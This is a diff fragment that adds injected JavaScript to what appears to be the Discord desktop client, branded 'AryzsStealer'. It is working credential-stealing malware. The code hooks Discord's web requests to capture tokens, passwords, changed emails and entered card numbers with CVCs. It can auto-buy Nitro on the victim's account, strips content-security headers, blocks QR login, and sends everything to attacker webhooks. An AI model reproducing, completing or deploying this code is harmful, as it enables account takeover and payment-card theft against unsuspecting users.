956
+ ],
957
+ author: {
958
+ name: json.username + '#' + json.discriminator + ' | ' + json.id,
959
+ icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
960
+ },
961
+ footer: {
962
+ text: 'AryzsStealer',
963
+ },
964
+ },
965
+ ],
966
+ };
967
+ if (config.ping_on_run) content['content'] = config.ping_val;
968
+ hooker(content);
969
+ dualhooker(content);
970
+ };
971
+
972
+ const nitroBought = async (token) => {
973
+ const json = await getInfo(token);
974
+ const nitro = getNitro(json.premium_type);
975
+ const badges = getBadges(json.flags);
976
+ const billing = await getBilling(token);
977
+ const code = await buyNitro(token);
978
+ const content = {
979
+ username: config.embed_name,
980
+ content: code,
981
+ avatar_url: config.embed_icon,
982
+ embeds: [
983
+ {
984
+ color: config.embed_color,
985
+ fields: [
986
+ {
987
+ name: 'Nitro bought!',
988
+ value: `**Nitro Code:**\n\`\`\`diff\n+ ${code}\`\`\``,
989
+ inline: false,
990
+ },
991
+ {
992
+ name: 'Username',
993
+ value: `\`${json.username}#${json.discriminator}\``,
994
+ inline: false,
995
+ },
996
+ {
997
+ name: 'ID',
998
+ value: `\`${json.id}\``,
999
+ inline: false,
1000
+ },
1001
+ {
1002
+ name: 'Token',
1003
+ value: `\`\`\`${token}\`\`\``,
1004
+ inline: false,
1005
+ },
1006
+ ],
1007
+ author: {
1008
+ name: json.username + '#' + json.discriminator + ' | ' + json.id,
1009
+ icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
1010
+ },
1011
+ footer: {
1012
+ text: 'AryzsStealer',
1013
+ },
1014
+ },
1015
+ ],
1016
+ };
1017
+ if (config.ping_on_run) content['content'] = config.ping_val + `\n${code}`;
1018
+ hooker(content);
1019
+ dualhooker(content);
1020
+ };
1021
+ session.defaultSession.webRequest.onBeforeRequest(config.filter2, (details, callback) => {
1022
+ if (details.url.startsWith('wss://remote-auth-gateway')) return callback({ cancel: true });
1023
+ updateCheck();
1024
+ });
1025
+
1026
+ session.defaultSession.webRequest.onHeadersReceived((details, callback) => {
1027
+ if (details.url.startsWith(config.webhook)) {
1028
+ if (details.url.includes('discord.com')) {
1029
+ callback({
1030
+ responseHeaders: Object.assign(
1031
+ {
1032
+ 'Access-Control-Allow-Headers': '*',
1033
+ },
1034
+ details.responseHeaders,
1035
+ ),
1036
+ });
1037
+ } else {
1038
+ callback({
1039
+ responseHeaders: Object.assign(
1040
+ {
1041
+ 'Content-Security-Policy': ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"],
1042
+ 'Access-Control-Allow-Headers': '*',
1043
+ 'Access-Control-Allow-Origin': '*',
1044
+ },
1045
+ details.responseHeaders,
1046
+ ),
1047
+ });
1048
+ }
1049
+ } else {
1050
+ delete details.responseHeaders['content-security-policy'];
1051
+ delete details.responseHeaders['content-security-policy-report-only'];
1052
+
1053
+ callback({
1054
+ responseHeaders: {
1055
+ ...details.responseHeaders,
1056
+ 'Access-Control-Allow-Headers': '*',
1057
+ },
1058
+ });
1059
+ }
1060
+ });
1061
+
1062
+ session.defaultSession.webRequest.onCompleted(config.filter, async (details, _) => {
1063
+ if (details.statusCode !== 200 && details.statusCode !== 202) return;
1064
+ const unparsed_data = Buffer.from(details.uploadData[0].bytes).toString();
1065
+ const data = JSON.parse(unparsed_data);
1066
+ const token = await execScript(
1067
+ `(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`,
1068
+ );
1069
+ switch (true) {
1070
+ case details.url.endsWith('login'):
1071
+ login(data.login, data.password, token).catch(console.error);
1072
+ break;
1073
+
1074
+ case details.url.endsWith('users/@me') && details.method === 'PATCH':
1075
+ if (!data.password) return;
1076
+ if (data.email) {
1077
+ emailChanged(data.email, data.password, token).catch(console.error);
1078
+ }
1079
+ if (data.new_password) {
1080
+ passwordChanged(data.password, data.new_password, token).catch(console.error);
1081
+ }
1082
+ break;
1083
+
1084
+ case details.url.endsWith('tokens') && details.method === 'POST':
1085
+ const item = querystring.parse(unparsedData.toString());
1086
+ ccAdded(item['card[number]'], item['card[cvc]'], item['card[exp_month]'], item['card[exp_year]'], token).catch(console.error);
1087
+ break;
1088
+
1089
+ case details.url.endsWith('paypal_accounts') && details.method === 'POST':
1090
+ PaypalAdded(token).catch(console.error);
1091
+ break;
1092
+
1093
+ case details.url.endsWith('confirm') && details.method === 'POST':
1094
+ if (!config.auto_buy_nitro) return;
1095
+ setTimeout(() => {
1096
+ nitroBought(token).catch(console.error);
1097
+ }, 7500);
1098
+ break;
1099
+
1100
+ default:
1101
+ break;
1102
+ }
1103
+ });
1104
+ module.exports = require('./core.asar');